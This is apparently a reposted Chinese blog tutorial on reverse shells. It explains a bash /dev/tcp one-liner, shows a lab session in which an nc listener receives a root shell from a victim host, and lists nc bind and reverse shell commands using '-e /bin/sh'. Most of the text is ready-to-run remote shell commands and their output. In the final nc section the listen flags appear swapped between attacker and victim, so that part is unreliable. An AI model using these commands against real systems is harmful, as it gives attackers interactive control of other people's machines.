shell反射

一、介绍

bash反射就是反弹一个交互的shell,类似ssh连接,可以执行命令

二、使用命令

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

bash -i 是打开一个交互的bash

>&  是将标准错误输出定向到标准输出中。

 /dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

0>&1 是将标准输入重定向到标准输出中。

三、实战测试

攻击端

##安装nc
yum install nc -y

#使用nc打开一个端口(我这使用80)
[root@server ~]# nc -v -l -p  80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

  

被攻击端

[root@localhost~]#/bin/bash -i >& /dev/tcp/10.0.0.1/80 0>&1

  

查看攻击端

[root@server  ~]# nc -v -l -p  80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.0.0.141.
Ncat: Connection from 10.0.0.141:56507.
[root@localhost~]#   //变成了被攻击端的界面
#执行命令测试
[root@localhost~]#pwd 
pwd 
/root 
[root@localhost~]#hostname 
hostname 
localhost.localdomain 
[root@localhost~]#ll /^H

nc正向连接

被攻击端: nc -lvp  8080 -e /bin/sh
攻击端: nc -nvl 10.0.0.138 8080 

nc反向连接  

攻击端:nc  10.0.0.138 8080
被攻击端: nc -vv 10.0.0.132 8080 -e /bin/sh

  

原文地址:https://www.cnblogs.com/zhangb8042/p/10494247.html